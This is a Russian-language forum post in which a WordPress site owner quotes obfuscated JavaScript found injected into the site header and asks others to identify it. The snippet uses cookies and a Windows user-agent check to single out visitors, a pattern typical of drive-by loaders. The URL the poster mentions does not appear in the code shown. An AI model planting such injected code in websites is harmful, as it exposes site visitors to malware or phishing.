У меня есть установка WordPress, на которую довольно сильно нацелена фишинговая операция. Я думал, что безопасность в основном покрыта, за исключением того, что я нашел это в заголовке:
var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};
Этот URL в конце очень подозрительный. Я погуглила, но не нашла подсказок: - (
Я еще не нашел источник кода в моей установке WP. Это не записано в файлы шаблона или базу данных. В процессе обновления WP устанавливаем сейчас.
Кто-нибудь знает об этом?